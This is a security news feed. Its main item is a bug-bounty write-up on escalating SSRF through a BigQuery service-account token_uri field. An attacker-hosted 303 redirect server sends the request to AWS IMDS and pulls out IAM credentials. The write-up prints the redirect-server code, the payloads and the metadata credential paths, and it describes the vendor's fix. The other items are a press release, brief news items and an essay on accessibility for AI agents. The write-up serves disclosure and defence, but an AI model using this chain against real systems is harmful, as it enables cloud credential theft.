<li>Each share of preferred stock convertible into 100 shares of Company common stock subject to stockholder approval.</li>



<li>Chris Young appointed Chief Executive Officer and Chairman of the Board.</li>



<li>Simon Yu appointed President.</li>



<li>Jason Maddox appointed Chief Financial Officer.</li>



<li>Phillip Oldridge stepped down as Chief Executive Officer.</li>
</ul>



<p><strong>About Envirotech Vehicles, Inc.</strong></p>



<p>Envirotech Vehicles, Inc. (NASDAQ: EVTV) is a technology infrastructure company focused on developing, owning, and operating artificial intelligence data centers, enterprise GPU compute infrastructure, digital power solutions, and digital asset mining operations. Following its acquisition of Azio AI, the Company operates an integrated AI infrastructure business encompassing AI data center development, the sale and distribution of enterprise GPU systems and server infrastructure, high-performance computing solutions, power hosting, and strategic technology investments, serving enterprise and institutional customers across domestic and international markets. Through this diversified AI infrastructure strategy, the Company is positioned to capitalize on the rapidly expanding global demand for AI infrastructure, compute capacity, digital power, and next-generation AI technologies.</p>



<p>For more information please visit: <a href="http://www.azioai.ai/" target="_blank" rel="sponsored">www.azioai.ai</a> and for potential partnerships contact: <a href="mailto:AI@PhoenixMGMTconsulting.com" target="_blank" rel="sponsored">AI@PhoenixMGMTconsulting.com</a></p>



<p><strong>Forward-Looking Statements</strong></p>



<p>This press release contains forward-looking statements within the meaning of the Private Securities Litigation Reform Act of 1995. In some cases, you can identify forward-looking statements by words such as “may,” “will,” “could,” “expect,” “anticipate,” “believe,” “estimate,” “project,” “intend,” “continue,” “potential,” “ongoing,” or the negative of these terms or other comparable terminology, although not all forward-looking statements contain these words. Forward-looking statements include statements regarding the Company’s ability to capitalize on accelerating demand for AI infrastructure, enterprise GPU compute, digital power solutions, data center development, and digital asset infrastructure; the Company’s plans to continue expanding its digital infrastructure platform through AI data center development, enterprise GPU compute solutions, power hosting services, digital asset mining operations, strategic infrastructure investments, and additional commercial partnerships; the Company’s ability to maximize utilization of its power resources while creating multiple long-term revenue opportunities; the ability to continue deploying modular digital infrastructure at the Company’s South Texas site; the anticipated deployment and scaling of NVIDIA B200 and B300 GPU systems; the ability to advance and execute against the Company’s commercial infrastructure pipeline; the anticipated development of the Company’s footprint; the ability to monetize power assets across multiple complementary revenue streams, including AI data centers, enterprise compute infrastructure, power hosting, and digital asset mining operations; customer demand for AI infrastructure, enterprise compute, and digital infrastructure; the Company’s ability to build a scalable platform designed to serve that demand and create long-term shareholder value; and the Company’s broader business strategy and long-term growth objectives.</p>



<p>These statements are based on current expectations and assumptions that involve risks and uncertainties that could cause actual results to differ materially. Most of these factors are outside the Company’s control and are difficult to predict. Factors that may affect actual results include, but are not limited to, the Company’s limited operating history within AI infrastructure and compute operations, project scope, engineering challenges, supply chain constraints, installation timelines, energy availability, finalization of site usage rights, regulatory considerations, equipment performance, ability to raise capital required for expansion activities, changes in digital asset markets, evolving compute demand, market conditions, the Company’s ability to successfully integrate the combined business following the completion of the merger, the risk that the anticipated benefits and synergies of the merger are not realized, the risk of unexpected costs, charges, or expenses resulting from or relating to the merger, potential adverse reactions or changes to business relationships resulting from the completion of the merger, risks related to the diversion of management’s attention from ongoing business operations during the post-closing integration period, the risk that required stockholder approval for the conversion of preferred stock issued in the merger as required by rules of The Nasdaq Stock Market LLC (the “Conversion Proposal”) is not obtained, and additional risks and uncertainties described in the Company’s most recent Annual Report on Form 10-K and subsequent Quarterly Reports on Form 10-Q filed with the SEC, which are available at www.sec.gov. The Company undertakes no obligation to update forward-looking statements except as required by law.</p>



<p><strong><em>Important Information About the Merger and Where to Find it</em></strong></p>



<p>The Company expects to file a proxy statement with the SEC relating to the Conversion Proposal. The definitive proxy statement will be sent to all Company stockholders. Before making any voting decision, investors and security-holders of the Company are urged to read the proxy statement and all other relevant documents filed or that will be filed with the SEC in connection with the Conversion Proposal as they become available because they will contain important information about the amended and restated merger agreement between the parties and the related transactions and the Conversion Proposal to be voted upon by the Company’s stockholders. Investors and security-holders will be able to obtain free copies of the proxy statement and all other relevant documents filed or that will be filed with the SEC by the Company through the website maintained by the SEC at www.sec.gov.</p>



<p><strong><em>Participants in the Solicitation</em></strong></p>



<p>The Company and its directors and executive officers may be considered participants in the solicitation of proxies from EVTV’s stockholders with respect to the Conversion Proposal under the rules of the SEC. Information about the directors and executive officers of EVTV is set forth in its Annual Report on Form 10-K for the year ended December 31, 2025, which was filed with the SEC on April 13, 2026, and in subsequent Quarterly Reports on Form 10-Q and other documents filed by the Company from time to time with the SEC. Additional information regarding the persons who may be deemed participants in the proxy solicitation and a description of their direct and indirect interests, by security holdings or otherwise, will also be included in the proxy statement, and other relevant materials to be filed with the SEC when they become available. You may obtain free copies of these documents as described above.</p>



<p>¹ Source: International Data Corporation (IDC), “AI Infrastructure Spending Caps Historic Year at ~$90 Billion in Q4 2025; 2029 Spending to Eclipse $1 Trillion,” April 16, 2026. The Company has not independently verified the data or projections contained in this report, and there can be no assurance that the projections will be realized.</p>



<h5 class="wp-block-heading">Contact</h5>



<p><strong>Phoenix MGMT &amp; Consulting</strong></p>



<p><strong>Press@PhoenixMGMTConsulting.com</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The HTTP 303 SSRF Hack : From Python HTTP Client Defaults to AWS Credential Exfiltration.]]></title>
<description><![CDATA[The HTTP 303 SSRF Hack : From Python HTTP Client Defaults to AWS Credential Exfiltration. A Deep Dive Into Escalating a Blind SSRF to Full ReadA POST to IMDS may fail — but a redirect can quietly turn it into something else.This writeup documents the chain from a URL typed field inside a service ...]]></description>
<link>https://tsecurity.de/de/3651407/hacking/the-http-303-ssrf-hack-from-python-http-client-defaults-to-aws-credential-exfiltration/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651407/hacking/the-http-303-ssrf-hack-from-python-http-client-defaults-to-aws-credential-exfiltration/</guid>
<pubDate>Tue, 07 Jul 2026 13:54:49 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>The HTTP 303 SSRF Hack : From Python HTTP Client Defaults to AWS Credential Exfiltration. A Deep Dive Into Escalating a Blind SSRF to Full Read</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/640/0*NCA12wxa9E9fNJ6A.jpeg"></figure><blockquote>A POST to IMDS may fail — but a redirect can quietly turn it into something else.</blockquote><p>This writeup documents the chain from a URL typed field inside a service account credential JSON to live AWS IAM credentials on a Kubernetes worker node. The chain depends on four components composing into a single vulnerability. A URL accepting field with no allowlist, an HTTP client with default redirect handling, an unauthenticated metadata service, and an error path that reflected response content. Any one of them, configured differently, breaks the exploit.</p><p>Four components compose into a single vulnerability. None of them is a bug alone. The composition is.</p><h3>The Field</h3><p>The platform had a feature for connecting customer-owned data warehouses. Snowflake, Redshift, Databricks, BigQuery, all four supported. The customer hands over connection parameters, the platform pulls user data out of the warehouse on a schedule. A perfectly reasonable B2B integration, the kind that exists in every modern SaaS product.</p><p>It is also, by design, outbound HTTP from the platform to a destination the customer controls. That sentence is the entire reason I looked at this feature first.</p><p>Three of the four warehouses authenticate the way you’d expect: username and password, JDBC string, host plus access token. BigQuery is the odd one out. BigQuery authenticates with a Google service account JSON, a multi-field credential blob whose contents drive an OAuth 2.0 flow. One of those fields is called token_uri.</p><p>In plain language, token_uri is the URL the auth library will POST to when it wants an OAuth token. I opened the BigQuery setup page and watched the test connection request fly across DevTools. There it was, nested inside a JSON string inside a JSON object:</p><pre>"security_config": {<br>  "service_account_creds": "{\"type\":\"service_account\",\"private_key\":\"...\",\"token_uri\":\"https://oauth2.googleapis.com/token\",\"client_email\":\"...\"}"<br>}</pre><p>A user-controlled URL field, embedded two levels deep, going straight to the backend. The dashboard wasn’t validating it. The frontend wasn’t even parsing the inner JSON. Whatever the customer typed into the credentials blob, the server received verbatim.</p><p>The endpoint did exactly what its name promised: test a connection. The field did exactly what its name promised: hold a token URI. The chain was already in the schema.</p><h3>The First Echo</h3><p>The polite thing was to test the assumption before building anything on top of it. I set up an OOB host through Interactsh and put its URL into token_uri</p><pre>"token_uri": "https://[oob-host].oast.pro/REDACTED-probe-1"</pre><p>Then I sent the test connection request with a minimal but valid BigQuery service account blob. A self-generated PKCS8 RSA key, a plausible client email, a project and dataset that didn’t need to exist because the test would fail at the auth step before it ever tried to hit a real BigQuery project.</p><p>Within a second, the Interactsh client lit up:</p><pre>[REDACTED-OOB-HOST].oast.pro received HTTP interaction from [REDACTED-AWS-IP]<br>POST /probe-1 HTTP/1.1<br>Host: [REDACTED-OOB-HOST].oast.pro<br>User-Agent: google-auth/2.x python-requests/2.x<br>Content-Type: application/x-www-form-urlencoded<br>...<br>grant_type=urn%3Aietf%3Aparams%3Aoauth%3Agrant-type%3Ajwt-bearer&amp;assertion=&lt;JWT&gt;That one interaction told me several things at once:</pre><p>The primitive was real, the verb was POST, the body was OAuth-shaped. It was enough to write up as a standalone finding, and I did. An authenticated user could force the server to make outbound HTTP POSTs to arbitrary URLs. low severity, submitted.</p><p>But I wouldn’t happy with it.</p><h3>No Callback</h3><p>AWS EKS nodes run with an IAM role attached. Code that wants AWS API access asks the node’s IAM role for temporary credentials through the Instance Metadata Service at 169.254.169.254. Anything that touches S3, ECR, CloudWatch, KMS goes through this path.</p><p>IMDS is a link-local address, reachable only from inside the EC2 instance itself. It returns plaintext metadata and JSON-formatted credentials to anyone on the box that knows the path.</p><p>If the platform’s worker pod could reach IMDS, and if I could make an authenticated HTTP request to IMDS through the token_uri primitive, the response would contain live IAM credentials for the EKS node role. That is the highest-value outcome this kind of SSRF can possibly produce. Everything else is commentary.</p><p>I started with the obvious:</p><pre>"token_uri": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"Generic warehouse-connection error back. Nothing from IMDS reflected. Same story with role-name guesses in the URL.</pre><p>The response came back fast: a generic warehouse-connection error. Nothing from IMDS. I tried again with a role name guessed from common EKS naming conventions. Same generic error.</p><p>That was strange. The primitive was working. Interactsh had already proven that. Pointing it at IMDS produced nothing.</p><p>Two possibilities, in plain terms.</p><ul><li>The pod is being egress-filtered at the network layer. IMDS is unreachable. There is no door.</li><li>Or, the pod can reach IMDS, but the HTTP exchange is failing for some reason I don’t yet understand. The door exists, but only opens one way.</li></ul><p>Those two diagnoses lead to completely different next moves. So before guessing, I measured..</p><h3>Three Numbers</h3><p>Three payloads. Thirty seconds apart. One question.</p><ul><li><strong>External server I controlled</strong> (http://[oob-host].oast.pro/) came back in ~1.5 seconds.</li><li><strong>Unroutable IP</strong> (http://10.255.255.1/, RFC 5737 space, no router on earth has a path to it) came back in ~28 seconds.</li><li><strong>IMDS itself</strong> (http://169.254.169.254/...) came back in ~0.34 seconds.</li></ul><p>The pattern is unambiguous.</p><p>The external OOB host takes 1.5 seconds because that is a real internet round trip.</p><p>The unroutable address takes 28 seconds because that is the default connect timeout in the requests library. The TCP stack gives up on a destination that does not exist.</p><p>IMDS takes 0.34 seconds. That is not a timeout. That is a successful TCP connection and a completed HTTP exchange, finished fast because the response was small. IMDS is reachable from the pod. The traffic is not being filtered.</p><p>Which meant the problem had to be at the HTTP layer. I went back and re-read the IMDSv1 documentation. There it was, sitting in the AWS docs like it had been waiting for me:</p><blockquote><em>IMDS responds with HTTP 405 Method Not Allowed for non-GET requests to metadata paths.</em></blockquote><p>Of course it does. google-auth POSTs. IMDS answers GETs. The POST gets a 405 with no body, google-auth has no access_token to parse, the surrounding worker code catches the exception, and the server returns a generic warehouse-connection error. The SSRF was working perfectly. The protocol on my side and the protocol on IMDS’s side simply didn’t match.</p><p>I sat with it for a day. Submitted the standalone finding. Came back the next morning and tried to ask the question differently.</p><p>Not how do I make the client send GET instead of POST.</p><p>That was the question I had been failing to answer.</p><p>The better question was:</p><p><em>What if I could let the client keep speaking POST, and have something in the middle translate it?</em></p><h3>The Idea: HTTP 303 See Other</h3><p>The answer came from a piece of RFC trivia I had seen in other people’s SSRF writeups over the years, finally landing on the right problem.</p><p>HTTP 303 See Other is defined, per RFC 7231 §6.4.4, to convert the caller’s HTTP method to GET when following the redirect.</p><p>Read that twice.</p><p>301 preserves the method, depending on the client.</p><p>302 is ambiguous, and most clients do the wrong thing for legacy reasons.</p><p>307 and 308 explicitly preserve the original method.</p><p>303 is the only redirect code in the standard whose explicit purpose is to change POST to GET.</p><p>It was designed for exactly that. The redirect-after-submit pattern in classic web forms. Submit via POST, get back a 303, follow it as a GET, render the result page. A pattern old enough to predate the AJAX era, now sitting inside a library’s default parameter.</p><p>The question was whether Python’s requests library, which google-auth wraps, actually implements this. I went and read the source. The SessionRedirectMixin.rebuild_method function contains, paraphrased, the following:</p><pre>if response.status_code == codes.see_other and method != 'HEAD':<br>    method = 'GET'</pre><p>It does. Cleanly. On a 303 response, the method is rewritten to GET. The body is stripped. A new request is constructed and sent to whatever URL is in the Location header.</p><p>I checked google-auth too. It uses requests.Session() with no redirect modifications and allow_redirects=True left at the library default. Whatever the final response is, even three redirects deep, gets parsed as an OAuth token document.</p><h3>The Full Chain</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*mbmWywejUSsBjzPxwoPdLw.png"></figure><p>Drawn out, the chain looks like this:</p><p>1. The attacker creates a service account JSON containing an attacker-controlled token_uri and submits it through the application’s connection-testing functionality.</p><p>2. The application forwards the supplied JSON to the backend worker without validating the destination URL.</p><p>3. The backend uses the google-auth library to generate a signed JWT and sends it to the attacker-controlled token_uri.</p><p>4. The attacker-controlled server records the incoming request and responds with a 303 See Other redirect pointing to the AWS Instance Metadata Service (IMDS) at 169.254.169.254.</p><p>5. Because redirects are automatically followed, the original POST request is rewritten into a GET request and sent to the metadata service.</p><p>6. AWS IMDS returns the IAM role credentials associated with the instance.</p><p>7. The google-auth library expects an OAuth token response, but instead receives AWS credential data and raises an exception.</p><p>8. The application includes the exception details in its error response and returns them to the user.</p><p>9. The attacker extracts the AWS AccessKeyId, SecretAccessKey, and SessionToken from the returned error message.</p><h3>Building the Redirect</h3><p>I needed a public server that would do three things.</p><ul><li>Accept any incoming HTTP request from the platform’s egress.</li><li>Log it in full, so I could see what google-auth was actually sending.</li><li>Respond with 303 See Other and a Location header pointing at whatever IMDS path I was probing.</li></ul><p>I wrote it in pure Python stdlib :</p><pre>from http.server import BaseHTTPRequestHandler, HTTPServer<br>import sys, datetime<br><br>TARGET = sys.argv[1] if len(sys.argv) &gt; 1 else "http://169.254.169.254/latest/meta-data/iam/info"<br><br>class Handler(BaseHTTPRequestHandler):<br>    def log_message(self, fmt, *args):<br>        print(f"[{datetime.datetime.utcnow().isoformat()}Z] {self.client_address[0]} {fmt % args}")<br><br>    def do_POST(self):<br>        length = int(self.headers.get("Content-Length", "0") or "0")<br>        body = self.rfile.read(length) if length else b""<br>        print(f"[POST] path={self.path} len={length}")<br>        print(f"[POST] headers:\n{self.headers}")<br>        if body:<br>            print(f"[POST] body (first 500B): {body[:500]!r}")<br>        print(f"[303] -&gt; {TARGET}")<br>        self.send_response(303)<br>        self.send_header("Location", TARGET)<br>        self.send_header("Content-Length", "0")<br>        self.end_headers()<br><br>    def do_GET(self):<br>        self.send_response(303)<br>        self.send_header("Location", TARGET)<br>        self.send_header("Content-Length", "0")<br>        self.end_headers()<br><br>if __name__ == "__main__":<br>    print(f"[*] Redirect target: {TARGET}")<br>    HTTPServer(("0.0.0.0", 7777), Handler).serve_forever()</pre><p>Bound to 0.0.0.0:7777. Port 7777 opened on my router. The IMDS target gets passed as a command-line argument, so I can change which file the redirect points at without rebuilding anything.</p><p>Then the payload itself, a BigQuery service account JSON with token_uri pointing at my server, embedded in a test connection request:</p><pre>{<br>  "app_group_id": "[REDACTED]",<br>  "data_warehouse_type": "bigquery",<br>  "project": "bugbounty-project",<br>  "dataset": "bugbounty_dataset",<br>  "security_config": {<br>    "service_account_name": "svc@project.iam.gserviceaccount.com",<br>    "service_account_creds": "{\"type\":\"service_account\",\"private_key\":\"&lt;PKCS8 RSA KEY&gt;\",\"token_uri\":\"http://[REDACTED-MY-IP]:7777/creds\",\"client_email\":\"svc@project.iam.gserviceaccount.com\",\"universe_domain\":\"googleapis.com\"}"<br>  }<br>}</pre><p>The private_key is a real 2048-bit RSA key I generated locally. It is not associated with any real Google service account. google-auth uses it only to sign the outbound JWT, and the JWT is never validated by anyone, because the OAuth server it is talking to is my redirect script, which never reads the signature. The key just has to be syntactically valid PKCS8 PEM that the library can load.</p><p>The client_email and universe_domain exist for the same reason: to make the JSON parse cleanly. None of them have to correspond to anything real.</p><h3>Does It Reflect?</h3><p>For the first shot, I did not aim at credentials. I pointed at /latest/meta-data/iam/info, which returns the InstanceProfileArn.</p><p>Two reasons.</p><p>I did not yet know the role name. I needed it to build a valid /security-credentials/ path.</p><p>And if the exploit worked, harmless metadata was a better first payload than live credentials. Less sensitive data to deal with under the Rules of Engagement, easier to validate cleanly, easier to write up.</p><p>Started the redirect server:</p><pre>python3 /tmp/redirect.py "http://169.254.169.254/latest/meta-data/iam/info"</pre><p>Fired the test connection request. About 1.4 seconds later, the response came back:</p><pre>{<br>  "result": "error",<br>  "message": "Error connecting to warehouse: Error executing SQL due to customer config: ('No access token in response.', {'Code': 'Success', 'LastUpdated': '[REDACTED-TIMESTAMP]', 'InstanceProfileArn': 'arn:aws:iam::[REDACTED]:instance-profile/[REDACTED-ROLE]', 'InstanceProfileId': '[REDACTED]'})"<br>}</pre><p>Read that slowly.</p><p>No access token in response is google-auth’s error when the token_uri response body does not parse as a valid OAuth token document.</p><p>The Python dict that follows it, with Code, LastUpdated, InstanceProfileArn, InstanceProfileId, is the literal body of the IMDS response. google-auth parsed it as JSON, failed to find an access_token, raised an exception, and the exception’s string representation included the parsed dict. The worker code wrapped the exception in its own error and returned the wrapped message back to me intact.</p><p>Three things became true at the same time.</p><ul><li>The 303 redirect chain works. POST converts to GET on the redirect, IMDS responds, the response comes home.</li><li>The reflection channel is open. Step 7, the gamble, paid off. Anything I can ask IMDS for, I can read.</li><li>And I now know the AWS account number and the EKS node role name.</li></ul><p>Meanwhile, the redirect server’s stdout:</p><pre>[REDACTED-TIMESTAMP] &lt;worker pod IP&gt; POST /creds HTTP/1.1<br>[POST] path=/creds len=710<br>[POST] headers:<br>Host: [REDACTED-MY-IP]:7777<br>User-Agent: google-auth/2.17.3 python-requests/2.31.0<br>Content-Type: application/x-www-form-urlencoded<br>...<br>[POST] body (first 500B): b'grant_type=urn%3Aietf%3Aparams%3Aoauth%3Agrant-type%3Ajwt-bearer&amp;assertion=eyJhbGciOiJSUzI1NiIsImtpZCI6...'<br>[303] -&gt; http://169.254.169.254/latest/meta-data/iam/info</pre><p>That is google-auth making its expected OAuth POST, getting back the 303, and transparently following it to IMDS, exactly as the RFC says it should.</p><p>The chain was live.</p><h3>The Credentials</h3><p>I restarted the redirect server pointing at the role-specific credentials path:</p><pre>python3 /tmp/redirect.py \<br>"http://169.254.169.254/latest/meta-data/iam/security-credentials/[REDACTED-ROLE]"</pre><p>Fired the test connection request again. The response is reproduced verbatim because the entire finding lives inside this one response body:</p><pre>{<br>"result": "error",<br>"message": "Error connecting to warehouse: Error executing SQL due to customer config: ('No access token in response.', {'Code': 'Success', 'LastUpdated': '[REDACTED-TIMESTAMP]', 'Type': 'AWS-HMAC', 'AccessKeyId': '[REDACTED-ACCESS-KEY]', 'SecretAccessKey': '[REDACTED-SECRET]', 'Token': '[REDACTED-SESSION-TOKEN]', 'Expiration': '[REDACTED-TIMESTAMP]'})"<br>}</pre><p>The credentials are real. Live, time-limited, in AWS-HMAC format, meaning any AWS SDK in the world would accept them without modification. The session token is the giveaway. Static keys do not have session tokens. Only credentials minted from an instance metadata call do.</p><p>These came from the EKS node’s IAM role, minutes ago, signed by AWS’s metadata service. They would work right now, against the real AWS account, until the timestamp at the bottom.</p><p>For completeness, one more probe, the instance identity document at /latest/dynamic/instance-identity/document, which returns placement metadata:</p><pre>{<br>"accountId": "[REDACTED]",<br>"architecture": "x86_64",<br>"availabilityZone": "us-east-1a",<br>"imageId": "[REDACTED]",<br>"instanceId": "[REDACTED]",<br>"instanceType": "c6i.8xlarge",<br>"pendingTime": "[REDACTED-TIMESTAMP]",<br>"privateIp": "172.16.21.236",<br>"region": "us-east-1",<br>"version": "2017–09–30"<br>}</pre><p>That filled out the rest of the picture.</p><p>Three lines on the writeup ledger.</p><ul><li>EC2 instance metadata leak. Medium on its own.</li><li>IAM instance profile disclosure. Medium on its own.</li><li>Live, time-limited AWS IAM credentials for the EKS node role. Critical.</li></ul><p>Delivered through a single endpoint reachable by any authenticated dashboard user, the three together add up to a cross-scope pivot from “I have a regular user account” to “I am the IAM role of the dev-cluster Kubernetes worker nodes.”</p><h3>Four Coincidences in a Row</h3><p>The chain works because four things are simultaneously true. If any one of them were different, it falls apart.</p><p>That makes each one a potential mitigation point. And each one, in isolation, is defensible. <strong>token_uri is not validated against an allowlist on the backend</strong>. The service account JSON is treated as opaque customer-provided configuration. There is no check that the URL points to a Google-controlled domain. In the adversarial case, the same field becomes an arbitrary outbound URL primitive.</p><p><strong>The requests library follows redirects by default. Including 303.</strong></p><p>allow_redirects=True is the default on every HTTP method in the library. google-auth does not override it. The 303 handling inside requests is RFC-compliant: POST converts to GET. No bug in requests. No bug in google-auth. Just a composition hazard.</p><p><strong>IMDSv1 is enabled and reachable from the worker pod.</strong></p><p>The EC2 node has IMDSv1 enabled, and the Kubernetes network policy allows pods to reach 169.254.169.254. A single HttpTokens=required instance metadata option would have broken the chain, because the attacker cannot perform IMDSv2’s PUT-first TTL token handshake through a one-shot redirect.</p><p><strong>The error path includes the raw exception string in the user-visible response.</strong></p><p>This is the reflection channel.</p><p>Without it, the SSRF is still there, but the read primitive degrades to a blind one. With it, the read is fully content-disclosing. Fix any one of these and the exploit breaks. Fix all four and the platform is resilient. The chain is not a bug in any one component. It is a property of how four reasonable components compose.</p><h3>Remediation and Verification</h3><p>A few days after reporting, I came back to check.</p><p>I re-ran the exact same payload, fresh session, fresh account, same redirect server, same IP. The response changed:</p><pre>{<br>  "error": "... Untrusted token_uri in service account credentials: http://[attacker-ip]:7777/creds. Only standard Google OAuth2 token endpoints are allowed: frozenset({'https://oauth2.googleapis.com/token', 'https://accounts.google.com/o/oauth2/token'})"<br>}</pre><p>HTTP 400. Blocked at input validation.</p><p>I also tested a legitimate Google token_uri to confirm the fix did not break working integrations. The request returned 201 Created.</p><p>The team chose the allowlist approach and implemented it at the field-parsing layer, which is the right place, because every code path that handles a service account JSON inherits the protection for free.</p><p>They did not pursue allow_redirects=False directly in google-auth, which is fine. The allowlist makes the redirect behavior moot. The frozenset in the error message is the Python giveaway that the validation lives in the same worker that previously called google-auth.</p><p>Right layer. Right shape. Shipped fast.</p><p>Vulnerability closed.</p><p>The single observation I want to leave for anyone reading this, defender or researcher :</p><blockquote><strong>Make an outbound HTTP request to this URL <em>is the single most dangerous feature a web application can expose. Treat every field that accepts one as if it were `eval()` of a URL, because functionally, that is what it is.</em></strong></blockquote><p>Every time. Every field. Every integration. Every <em>just pass it through to the library</em>.</p><p><em>When a primitive gives you the wrong verb, do not give up on the primitive. Give up on the verb.</em></p><p>It was a composition hazard dressed up as a configuration option, waiting in the schema of a well-known credential format for anyone who cared to read the token_uri field and ask what it did.</p><p>The chain is patched.</p><p>The pattern isn’t.</p><p>Try 303.</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=bfaece6c3805" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/the-http-303-hack-from-python-http-client-defaults-to-aws-credential-exfiltration-a-deep-dive-bfaece6c3805">The HTTP 303 SSRF Hack : From Python HTTP Client Defaults to AWS Credential Exfiltration.</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Deepseek is designing its own AI chip]]></title>
<description><![CDATA[Chinese startup Deepseek is building its own AI chip, Reuters reports. 
The article Deepseek is designing its own AI chip appeared first on The Decoder.]]></description>
<link>https://tsecurity.de/de/3651326/ai-nachrichten/deepseek-is-designing-its-own-ai-chip/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651326/ai-nachrichten/deepseek-is-designing-its-own-ai-chip/</guid>
<pubDate>Tue, 07 Jul 2026 13:19:41 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="2048" height="1152" src="https://the-decoder.com/wp-content/uploads/2026/06/deepseek_red_whale.png" class="attachment-full size-full wp-post-image" alt="" decoding="async" fetchpriority="high"></p>
<p>        Chinese startup Deepseek is building its own AI chip, Reuters reports. </p>
<p>The article <a href="https://the-decoder.com/deepseek-is-designing-its-own-ai-chip/">Deepseek is designing its own AI chip</a> appeared first on <a href="https://the-decoder.com/">The Decoder</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Tickt die Cloud in Europa anders?]]></title>
<description><![CDATA[Die Cloud bewegt die Gemüter. KI treibt die Kosten in schwindelerregende Höhen. Multicloud, Hybrid-IT und SaaS erhöhen die Komplexität. Und mit der Frage nach digitaler Souveränität bekommt die IT-Infrastruktur nun auch eine politische Dimension. Wie steht es also tatsächlich um die Cloud? Der „F...]]></description>
<link>https://tsecurity.de/de/3651180/it-security-nachrichten/tickt-die-cloud-in-europa-anders/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651180/it-security-nachrichten/tickt-die-cloud-in-europa-anders/</guid>
<pubDate>Tue, 07 Jul 2026 12:24:34 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die Cloud bewegt die Gemüter. KI treibt die Kosten in schwindelerregende Höhen. Multicloud, Hybrid-IT und SaaS erhöhen die Komplexität. Und mit der Frage nach digitaler Souveränität bekommt die IT-Infrastruktur nun auch eine politische Dimension. Wie steht es also tatsächlich um die Cloud? Der „Flexera State of the Cloud Report 2026“ zeichnet ein Bild der aktuellen Lage.]]></content:encoded>
</item>
<item>
<title><![CDATA[Accessibility is the first-class interface for AI agents]]></title>
<description><![CDATA[When I started evaluating browser agents, most of the conversation around me focused on multimodal models, computer-use systems and screenshot-based automation. Almost every framework I evaluated assumed agents needed to perceive the web the way humans do, visually, pixel by pixel.The more time I...]]></description>
<link>https://tsecurity.de/de/3650967/ai-nachrichten/accessibility-is-the-first-class-interface-for-ai-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650967/ai-nachrichten/accessibility-is-the-first-class-interface-for-ai-agents/</guid>
<pubDate>Tue, 07 Jul 2026 11:04:21 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>When I started evaluating browser agents, most of the conversation around me focused on multimodal models, computer-use systems and screenshot-based automation. Almost every framework I evaluated assumed agents needed to perceive the web the way humans do, visually, pixel by pixel.<br><br>The more time I spent shipping agents against real web applications, the more I became convinced we were solving the wrong problem. AI agents would stall on checkout forms because a button had no ARIA role. They would waste seconds and thousands of tokens taking screenshots to figure out what was on the screen.</p>



<p>The problem was never the Agent. It was that we kept treating the web as a visual surface, even though it already has a machine-readable interface. We have had one for decades. It is called the accessibility tree.</p>



<h2 class="wp-block-heading"><a></a>The web already has a machine interface</h2>



<p>Most developers think of accessibility as a feature for people. Technically,<a href="https://developer.mozilla.org/en-US/docs/Web/Accessibility/ARIA"> accessibility required the web platform to solve a deeper problem</a>: Exposing interfaces in a machine-readable form. Long before AI agents existed, screen readers were already consuming the web through a structured semantic representation of roles, labels, states and relationships. There was no pixel interpretation and no screenshot.</p>



<p>That’s not adjacent to what AI agents need. That <em>is</em> what AI agents need. Long before LLMs existed, assistive technologies proved the core thesis: Machines can navigate interfaces, semantics can outlive presentation and structure can substitute for vision. Screenshot-based agents spend tokens rediscovering facts the browser already knows. The accessibility tree already contains role, name and state in structured form. In my own agent work, switching from screenshot-based to DOM-native execution cut per-action latency from 2–5 seconds to under 500ms and token cost by an order of magnitude.</p>



<h2 class="wp-block-heading">Accessibility proved the thesis. Now we need the next layer</h2>



<p>The most clarifying realization I had was this: Accessibility had already solved a large portion of the problem agents face. Accessibility gives machines a way to <em>discover</em> interfaces. It exposes available controls, their names, their states and their relationships. But discovery is not execution. The accessibility tree can identify a button named “Checkout” and indicate whether it is disabled. What it cannot provide is a contract for the action itself. For example, what inputs it accepts, what preconditions are required and what state changes it produces.</p>



<p>One emerging response to this gap is <a href="https://webmachinelearning.github.io/webmcp/">WebMCP</a>, which introduces a browser-native way to expose typed capabilities that agents can invoke directly. When a form field has no explicit agent annotation, Chrome’s declarative API derives the parameter description from the associated <label> element first. It falls back to aria-description if no label exists. The same HTML that accessibility has required developers to write correctly for thirty years is now the primary input to your agent tool contract. A colleague put it well: “If we had done a good job with accessibility, we should get this for free.”</label></p>



<h2 class="wp-block-heading"><a></a>The frontend patterns that break both</h2>



<p>Modern component architectures actively degrade the semantic quality that accessibility and agents both depend on. When a design system wraps a native button in a custom component, what reaches the DOM is often a div with generated class names and no semantic role. The accessibility tree gets “generic” instead of “button.” Under WebMCP’s declarative API, a form field with no label has no parameter description for the browser to inherit. Either way, the agent has nothing to work with.</p>



<p>Beyond div soup, <a href="https://tanstack.com/virtual/latest"> virtualized lists</a> only render visible rows, making out-of-viewport content completely unreachable. Client state that updates visually but never updates ARIA attributes leaves agents acting on stale snapshots. The common thread is that accessibility was treated as a concern for human users only, and the semantic layer got quietly destroyed in the abstraction. That’s now a double failure.</p>



<h2 class="wp-block-heading"><a></a>Designing for determinism</h2>



